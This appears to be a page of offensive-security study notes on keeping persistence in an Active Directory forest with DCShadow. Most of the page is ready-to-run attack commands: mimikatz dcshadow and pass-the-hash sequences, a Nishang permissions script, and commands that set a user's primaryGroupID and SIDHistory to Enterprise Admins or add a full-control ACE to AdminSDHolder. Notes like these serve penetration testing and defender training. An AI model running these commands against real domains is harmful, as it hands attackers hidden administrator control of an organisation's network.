Hacking Notes logo Hacking Notes

Active Directory

Forest Persistence

We are going to discuss some ways to do a persistence in a forest root.

DCShadow

DCShadow temporaly registers a new DC in the target domain and uses it to push attributes like SID History, SPNs and more over on the specified object without leaving the cange logs for modified object.

The new domain controller is registered by modifying the configuration container, SPNs of an exisiting computer object and couple of RPC services.

Due to the attributes are changed from a domain dontroller, there are no change logs on the actual DC for the target object.

By default, domain administrative privileges are required to use DCShadow.

To execute this persistence we need to use two isntances of mimikatz. The first one starts RPC servers with SYSTEM privileges and specify attributes to be modified:

!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"

And the second one with enough privileges, such as DA, will push the values:

privilege::debug
sekurlsa::pth /userAdministrator /domain:corp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate
lsadump::dcshadow /push

Note: DCShadow can be used with minimal permissions by modifyng ACLs, Nishang has a script to set this permissions to a user.

Set-DCShadowPermissions -FakeDC machine-user01 -SAMAccountName root1user -Username user01 -Verbose

Set Primary Group ID to Enterprise Admin

Now that we have been discovered how to overwrite attributes of users, we can change the group id of a user to the id of the enterprise administrators or domain admins.

lsadump::dcshadow /object:user01 /attribute:primaryGroupID /value:519

Note: This makes noise, because every one who looks net group "Enterpise Admins" /domain will see that the user user01 is a member.

Change SIDHistory of a user

We can modify the SIDHistory of a user with SID of Enterprise Admins group in order to obtain full control of the forest.

lsadump::dcshadow /object:user /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519

Modify ntSecurityDescriptor for AdminSDHolder

We can modify the ntSecurityDescriptor for AdminSDHolder to add full control for a user.

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=corp,DC=local")).psbase.ObjectSecurity.sddl

We just need to append a full control ACE from above DA with our users SID.

lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:ntSecurityDescriptor /value:<MODIFIED ACL>

Modified ACL:

ORIGINAL ACL + FULL CONTROL FOR OUR USER
....(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-560323961-2315414123-15432421423-1323)

Note: We just need to add our SID to the SY/BA/DA ACE result. To see the SID we can use:

Get-NetUser user01

Shadowception

We can even run DCShadow from DCShadow. To do that task we will add the following ACLs:

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=corp,DC=local")).psbase.ObjectSecurity.sddl

Note We can use /stack to stack multiple ACL.

Domain Object

Attacker Computer Object

Target User Object

Sites Configuration Object

Finally we just start the server:

lsadump::dcshadow

And on the other session with DA privileges:

lsadump::dcshadow /push